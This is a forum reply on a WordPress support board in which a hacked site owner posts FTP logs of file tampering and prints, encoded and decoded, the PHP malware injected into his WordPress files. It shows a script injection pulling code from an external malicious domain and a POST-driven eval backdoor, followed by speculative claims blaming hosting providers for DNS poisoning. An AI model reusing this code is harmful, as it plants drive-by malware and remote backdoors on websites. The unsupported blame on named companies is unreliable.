sickofhackers

Forum Replies Created

Viewing 1 replies (of 1 total)
  • Forum: Installing WordPress
    In reply to: Fatal Error with wp-config.php(1)
    sickofhackers

    (@sickofhackers)

    16 years, 6 months ago

    Scan you system for a trojan. Do you find one?
    Did you happen to ever use SiteBuilder to edit your site?
    Do you use Hostgator, Godaddy or IXwebhosting.com for your provider?

    I will update more in the morning as I will be off work and can organize my notes better. To me it looks like some companies may have had their servers hacked into. I use hostgator and my site got hacked as well as many many others. Just search for hostgator hacked, godaddy hacked, sitebuilder hacked, wordpress hacked, ecommerce hacked. Set your search to look for only posts in the past week. You will be shocked.

    From the looks of it some of these hosts got their database stolen and now it is being used to spread malware like crazy. The Butterfly trojan is exploding right now and Botnets are popping up like crazy.

    Bottom line… Accounts were stolen and now they are being used to host malware and cache poison to further spread the Botnets.

    Here is what I have time to post right now. I will post more in the morning when I have all my logs.

    Hey there.

    The same thing happened to my site and I am on the search for the ^$*&#) that did it, and mark my words I will find out. Here is what I have found so far.

    On Oct 23 someone used ftp to edit and modify my site files.

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-db.php downloaded (33292 bytes, 1648.25KB/sec)

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-db.php uploaded (33304 bytes, 190.64KB/sec)

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-diff.php downloaded (12373 bytes, 212.57KB/sec)

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/fantversion.php downloaded (36 bytes, 2.81KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/index.php downloaded (2278 bytes, 43572.71KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/index.php uploaded (2290 bytes, 52.37KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/readme.html downloaded (7711 bytes, 446.11KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-app.php downloaded (40543 bytes, 5860.32KB/sec)

    At the top of each of the replaced files was the following base_64. Here is the base_64 code decoded line by line.

    aWYoIWlzc2V0KCRjcG8xKSl7ZnVuY3Rpb24gY3BvKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk

    decodes to

    if(!isset($cpo1)){function cpo($s){if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))

    Nsl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14

    decodes to

    5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}if(preg_match_all(‘#<iframe ([^>]*?)src=[\'”]?(http:)?//([^

    Xso/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkpwYjJKbFoyeGxlUzVqYjIwdmRHMXdMM1JsWVcxamFHRnNiR1Z1WjJVdWNHUm1MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gY3BvMigkYSwkYiwkYywkZCl7Z2xvYmFsICRjcG8xOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRjcG8xKSljYWxsX3VzZXJfZnVuYygkY3BvMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdjcG8nKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk

    decodes to

    ]*?)>#is’,$s,$a))foreach($a[0] as $v)if(preg_match(‘# width\s*=\s*[\'”]?0*[01][\'”> ]|display\s*:\s*none#i’,$v)&&!strstr($v,’?’.’>’))$s=preg_replace(‘#’.preg_quote($v,’#’).’.*?</iframe>#is’,”,$s);$s=str_replace($a=base64_decode(‘PHNjcmlwdCBzcmM9aHR0cDovL2Jpb2JlZ2xleS5jb20vdG1wL3RlYW1jaGFsbGVuZ2UucGRmLnBocCA+PC9zY3JpcHQ+’),”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,$a.’\1′,$s);elseif(strpos($s,’,a’))$s.=$a;return $s;}function cpo2($a,$b,$c,$d){global $cpo1;$s=array();if(function_exists($cpo1))call_user_func($cpo1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’cpo’)return;elseif($a==’ob_gzhandler’)break;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i

    “DO NOT GO TO THIS SITE IF YOU DO NOT KNOW WHAT YOU ARE DOING”
    This string from above is the winner, It decodes to “<script src=http: / / biobegley. Com/ tmp/ teamchallenge. Pdf. Php”. The file on this site is changing rapidly. It looks like the hacked site redirects to here, then this site gets the host name from the hacked site and passes back the malware to be installed. I have contacted ecommerce.com and they are looking into this site.

    I am in the process of tracking down these sites as well to find the source of this but it will take me a bit as I work a lot.

    ($a=base64_decode(‘PHNjcmlwdCBzcmM9aHR0cDovL2Jpb2JlZ2xleS5jb20vdG1wL3RlYW1jaGFsbGVuZ2UucGRmLnBocCA+PC9zY3JpcHQ+’)

    PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnY3BvJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGNwb2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2NwbzInKSkhPSdjcG8yJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs

    decodes to

    =0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘cpo’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$cpol=(($a=@set_error_handler(‘cpo2′))!=’cpo2’)?$a:0;eval(base64_decode($_POST[‘e’]));

    The source of the initial ftp upload resolves to ecommerce.com. Ecommerce.com uses SiteBuilder from Ixwebhosting.com. It looks like many companies use Parallel.com’s SiteBuilder for webdesign.

    Parallel.com = 68.178.232.100…. 68.178.232.100 = Godaddy.com

    Right now a Whois for godaddy.com shows their nameservers are these.
    NameServer: CNS1.SECURESERVER.NET
    NameServer: CNS2.SECURESERVER.NET
    NameServer: CNS3.SECURESERVER.NET
    look a little deeper into these name servers and we get this,
    CNS1.SECURESERVER.NET.LTCHOMETOWN.COM
    This DNS server is

    CNS1.SECURESERVER.NET.LTCHOMETOWN.COM whois resolves to this IP 216.21.231.87 which belongs to register.com. The hostname resolves to 208.109.14.24 and that belongs to GoDaddy.com as well.

    Secureserver.nets Whois looks like this for the nameservers.
    SECURESERVER.NET.TRAVELWITHINCOME.COM
    SECURESERVER.NET.STRICTLYMODIFIEDCUSTOMS.COM
    SECURESERVER.NET.ANTIGENICA.COM resolves to 216.239.32.21
    SECURESERVER.NET.ALTAOWBA.COM
    SECURESERVER.NET

    216.239.32.21 is now being flagged.

    The sites pointing to this IP that are also flagged for malware are below. source:http://www.mywot.com/en/forum/4700-fake-bank-and-other-scams?comment=22019

    usedvpp.com
    motors-vehicles-purchase-transactions.com
    Postbank / Fortis Bank
    Barclays Bank
    Finance and Investment Bank LTD aka London Bank Limited
    World Youth Aids Organisation
    Air Express Ltd.
    Lloyds TSB
    Trade Escrow LLC
    Best-Autos Spedition Ltd
    vpp-safepay.com
    World conference on global peace / human trafficking & human right
    Trident Express
    cartrading2.net
    Fast-Kargo (PVT) Ltd
    STS Spedition
    Dependable Auto Shippers
    International Courier Express
    Bank for International Settlements
    Standard Chartered Bank
    Island Trust Bank
    Central Bank of Nigeria
    DCC Diplomatic Services

    So you see this is a very very elaborate Botnet going on. I mean they have DNS poisoning

Viewing 1 replies (of 1 total)